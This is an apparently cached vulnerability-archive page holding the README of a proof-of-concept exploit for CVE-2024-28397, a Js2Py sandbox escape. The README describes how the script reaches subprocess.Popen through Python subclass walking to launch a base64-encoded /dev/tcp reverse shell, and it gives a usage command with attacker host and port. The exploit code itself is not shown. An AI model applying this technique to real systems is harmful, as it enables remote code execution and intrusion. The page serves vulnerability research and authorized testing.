Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-28397 PoC — Js2Py 安全漏洞

Source
https://github.com/nelissandro/CVE-2024-28397-Js2Py-RCE
Associated Vulnerability
Title:Js2Py 安全漏洞 (CVE-2024-28397)
Description:Js2Py是Python基金会的一个库。用于将 JavaScript 转换为 Python 代码。 Js2Py 0.74 及之前版本存在安全漏洞,该漏洞源于组件 js2py.disable_pyimport() 中存在一个问题,攻击者利用该漏洞可以通过精心设计的 API 调用执行任意代码。
Description
This repository contains a Proof of Concept (PoC) for CVE-2024-28397, a vulnerability in the js2py library allowing a sandbox escape to achieve remote code execution.
Readme
# CVE-2024-28397-Js2Py-RCE
📌 **Description**

This repository contains a Python-based Proof of Concept (PoC) for CVE-2024-28397, a sandbox escape vulnerability in the Js2Py JavaScript interpreter for Python.
When the target application evaluates untrusted JS code via Js2Py, an attacker can break out of the sandbox and execute arbitrary Python code. This can be leveraged to gain remote code execution (RCE) and a reverse shell on the vulnerable system.

This exploit was inspired by Marven11’s [CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape) project.

---

⚠️ **Disclaimer**

This script is provided for educational and authorized penetration testing purposes only. Unauthorized use of this script against systems you do not own or have explicit permission to test is illegal and unethical. The author assumes no responsibility for misuse or damage caused by this script.

---

🧠 **About the Vulnerability**
- CVE ID: [CVE-2024-28397](https://nvd.nist.gov/vuln/detail/CVE-2024-28397)
- Component: Js2Py sandbox escape
- Impact: Unrestricted access to Python’s object model via `__class__.__base__.__subclasses__`, leading to arbitrary code execution
- Attack Vector: Remote (via exposed HTTP interface evaluating user-controlled JavaScript)

---

🚀 **Features**
- Automatic reverse shell payload delivery via Python RCE
- Inline Base64-encoded shell command execution
- Built-in reverse shell listener with basic PTY stabilization
- Clean output formatting
- Lightweight and dependency-free (except for requests)

---

🔧 **Requirements**
- Python 3.x
- `requests` module (`pip install requests`)
- A Linux system (for `/dev/tcp` reverse shell)
- A target running a vulnerable implementation of Js2Py

---

📦 **Usage**
```
python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
```
- `--target`: The full URL to the vulnerable web app endpoint
- `--lhost`: Your local IP address (used for reverse shell)
- `--lport`: Your local port to receive the shell

---

🛠️ **How It Works**
1. The script prepares a Bash reverse shell, Base64-encodes it, and injects it into a JavaScript payload.
2. The JS payload walks the Python object tree using `__class__.__base__.__subclasses__()` to find `subprocess.Popen`.
3. It uses `Popen` to decode and execute the shell.
4. The attacker’s machine receives the reverse shell and automatically stabilizes it.
File Snapshot

 [4.0K]  /data/pocs/cde797a416267fc9b08fdd6e18ef3a1112a9c4be
├── [4.2K]  exploit.py
└── [2.4K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.